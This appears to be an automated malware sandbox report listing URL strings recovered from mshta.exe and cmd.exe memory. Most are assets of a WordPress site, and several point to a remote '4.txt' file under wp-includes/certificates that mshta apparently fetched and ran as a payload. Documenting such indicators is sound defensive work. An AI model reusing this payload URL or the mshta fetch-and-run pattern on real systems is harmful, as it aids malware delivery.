Source: mshta.exe, 00000008.00000003.1035827310.000000000468B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1173969677.000000000468D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167470567.00000000002E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1036058154.000000000468C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0-US
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0.NET4.0E)d
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.00C;
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.019
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0;
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0er=2.6.00.9.3
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0r=1.04.0E)
Source: mshta.exe, 00000008.00000002.1177426727.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/style.css.9.20hi(
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/style.css.9.20ive.css.NET4.0E)
Source: mshta.exe, 00000008.00000003.1061744000.0000000003804000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1093595277.0000000003804000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1093794569.0000000003807000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1061861096.0000000003807000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1171474551.0000000003808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1171814085.000000000394D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/bootstrap.css
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/bootstrap.css.COM;.1
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1171814085.000000000394D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/responsive.css
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/responsive.cssS
Source: mshta.exe, 00000008.00000002.1171814085.000000000394D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/responsive.cssb
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/favicon.ico
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpg
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpg);
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpg.0=1.0
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpg6
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpge
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172277354.0000000003A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.0
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.01.0
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.0C:
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.0O
Source: mshta.exe, 00000008.00000002.1171814085.000000000394D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.0r=1.0
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1171814085.000000000394D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0
Source: mshta.exe, 00000008.00000002.1171814085.000000000394D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0;
Source: mshta.exe, 00000008.00000002.1170406636.00000000031F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0http://facextrade.c
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0r
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0ver=5.0.30E)ferr
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0ver=5.0.3n.js?ver=1
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172277354.0000000003A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0.NET4.0E)
Source: mshta.exe, 00000008.00000003.1035827310.000000000468B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1173969677.000000000468D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1036058154.000000000468C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.00
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.02C:
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0=5.0.3
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0ET4.0E)L=
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0S
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/main-style.css
Source: mshta.exe, 00000008.00000002.1167349641.0000000000292000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/main-style.css.css?ver=4.9.204.9.201.2.8.1241
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/main-style.css20
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/style.css
Source: mshta.exe, 00000008.00000002.1177855943.000000000538D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/style.cssBn
Source: mshta.exe, 00000008.00000002.1177855943.000000000538D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/style.cssKn
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/style.cssa.css
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/uploads/2018/08/facex_horizontal2-e1535501425981.png
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/uploads/2018/08/facex_horizontal2-e1535501425981.png4.0E)e
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177855943.000000000538D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1171814085.000000000394D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/
Source: mshta.exe, 00000008.00000002.1167157736.000000000023E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167470567.00000000002E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1168207147.0000000002670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt#
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt#D
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt...3
Source: cmd.exe, 00000002.00000002.1166906475.000000000044E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txtAWinSta0
Source: mshta.exe, 00000008.00000002.1166866976.0000000000200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txtWinSta0
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txtcy
Source: mshta.exe, 00000008.00000002.1170385250.00000000031E7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1061193305.0000000002FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1169795103.0000000002FF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txthttp://facextrade.com.br/wp-includes/certific
Source: mshta.exe, 00000008.00000002.1166866976.0000000000200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txtmshta
Source: cmd.exe, 00000002.00000002.1166906475.000000000044E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txtsmshta
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/c
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/g
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/privacy-policyflateC
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/privacy-policyng4
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1171814085.000000000394D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/swfobject.js?ver=2.2-20120417
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/swfobject.js?ver=2.2-20120417..)
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/swfobject.js?ver=2.2-201204172.1
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/swfobject.js?ver=2.2-201204179
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/swfobject.js?ver=2.2-20120417C:
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/swfobject.js?ver=2.2-20120417igrate-1.2.1.min.js?ver=1.2.1=1
Source: mshta.exe, 00000008.00000003.1035827310.000000000468B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1173969677.000000000468D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1036058154.000000000468C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177426727.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-embed.min.js?ver=4.9.20
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-embed.min.js?ver=4.9.20Time.js?ver=1.0%
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-embed.min.js?ver=4.9.20a.min.js?ver=1.3.4=1.0R
Source: mshta.exe, 00000008.00000002.1177426727.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-embed.min.js?ver=4.9.20author
Source: mshta.exe, 00000008.00000002.1177426727.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-embed.min.js?ver=4.9.20f(a.g)
Source: mshta.exe, 00000008.00000002.1178330848.0000000005407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-embed.min.js?ver=4.9.20p
Source: mshta.exe, 00000008.00000002.1171814085.000000000394D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1180809282.0000000006454000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.943282362.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172277354.0000000003A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.20
Source: mshta.exe, 00000008.00000002.1171814085.000000000394D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.20.css
Source: mshta.exe, 00000008.00000002.1180809282.0000000006454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.20/jquery.flexslider-min.js?
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.20P
Source: mshta.exe, 00000008.00000002.1180809282.0000000006454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.20PX6r
Source: mshta.exe, 00000008.00000002.1171814085.000000000394D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.20css
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.20ou
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/wlwmanifest.xml
Source: mshta.exe, 00000008.00000002.1177855943.000000000538D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/wlwmanifest.xml.txt7u
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/xmlrpc.php
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/xmlrpc.phpa
Source: mshta.exe, 00000008.00000003.937402502.00000000003AB000.00000004.00000020.00020000.00000000.sdmp, font-awesome[1].css.8.drString found in binary or memory: http://fontawesome.io
Source: mshta.exe, 00000008.00000003.937402502.00000000003AB000.00000004.00000020.00020000.00000000.sdmp, font-awesome[1].css.8.drString found in binary or memory: http://fontawesome.io.
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/
Source: mshta.exe, 00000008.00000002.1177855943.000000000538D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato&subset=latin
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato&subset=latink/css/magnific-popup.css?ver=0.9.3public.css
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:100
Source: mshta.exe, 00000008.00000002.1167157736.000000000023E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:100s/4.txt
Source: mshta.exe, 00000008.00000002.1171814085.000000000394D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:300-release.min.js?ver=4.9.20css
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:300er=1.24
Source: mshta.exe, 00000008.00000002.1177855943.000000000538D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:4004.txt
Source: mshta.exe, 00000008.00000002.1171814085.000000000394D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:400s
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:700/1.1s:
Source: mshta.exe, 00000008.00000002.1177855943.000000000538D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:7004.txtgu
Source: mshta.exe, 00000008.00000002.1178330848.0000000005407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:700eyfroj
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:700t:
Source: mshta.exe, 00000008.00000002.1178330848.0000000005407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:9000%
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:9004.txtl
Source: mshta.exe, 00000008.00000002.1178330848.0000000005407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:900ity:
Source: mshta.exe, 00000008.00000002.1178330848.0000000005407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:900rans.j
Source: mshta.exe, 00000008.00000002.1182040283.000000000669D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/a
Source: mshta.exe, 00000008.00000002.1182040283.000000000669D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/e
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u8w4BMUTPHh30AXC-u.eot
Source: mshta.exe, 00000008.00000003.958359984.0000000000418000.00000004.00000020.00020000.00000000.sdmp, css[1].css0.8.drString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u8w4BMUTPHh30AXC-u.eot);
Source: mshta.exe, 00000008.00000002.1177426727.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u8w4BMUTPHh30AXC-u.eot);cssGe.pro
Source: mshta.exe, 00000008.00000002.1167349641.0000000000292000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u8w4BMUTPHh30AXC-u.eot/modernizr.js?ver=2.0.6)
Source: mshta.exe, 00000008.00000002.1178330848.0000000005407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u8w4BMUTPHh30AXC-u.eotC:
Source: mshta.exe, 00000008.00000002.1167470567.00000000002E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh50XSwiPHQ.eot
Source: mshta.exe, 00000008.00000003.958481713.000000000612A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177426727.00000000052D3000.00000004.00000020.00020000.00000000.sdmp, css[4].css.8.drString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh50XSwiPHQ.eot);
Source: mshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh50XSwiPHQ.eotC:
Source: mshta.exe, 00000008.00000002.1177855943.000000000538D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh50XSwiPHQ.eotge:url(ima
Source: mshta.exe, 00000008.00000002.1177855943.000000000538D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh50XSwiPHQ.eotnsition:al
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh50XSwiPHQ.eott.png/
Source: mshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh6UVSwiPHQ.eot
Source: mshta.exe, 00000008.00000002.1177855943.000000000538D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh6UVSwiPHQ.eot#2ecc71;
Source: css[3].css.8.drString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh6UVSwiPHQ.eot);
Source: mshta.exe, 00000008.00000002.1177426727.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh6UVSwiPHQ.eot);l
Source: mshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh6UVSwiPHQ.eotC:
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh6UVSwiPHQ.eotPB6TY=
Source: mshta.exe, 00000008.00000002.1177855943.000000000538D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh6UVSwiPHQ.eotding:10px
Source: mshta.exe, 00000008.00000002.1167470567.00000000002E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh7USSwiPHQ.eot
Source: mshta.exe, 00000008.00000003.958333579.0000000000433000.00000004.00000020.00020000.00000000.sdmp, css[2].css.8.drString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh7USSwiPHQ.eot);
Source: mshta.exe, 00000008.00000002.1177426727.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh7USSwiPHQ.eot);s
Source: mshta.exe, 00000008.00000002.1178615460.00000000054AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh7USSwiPHQ.eot;-ms-opacity:.55;0.6
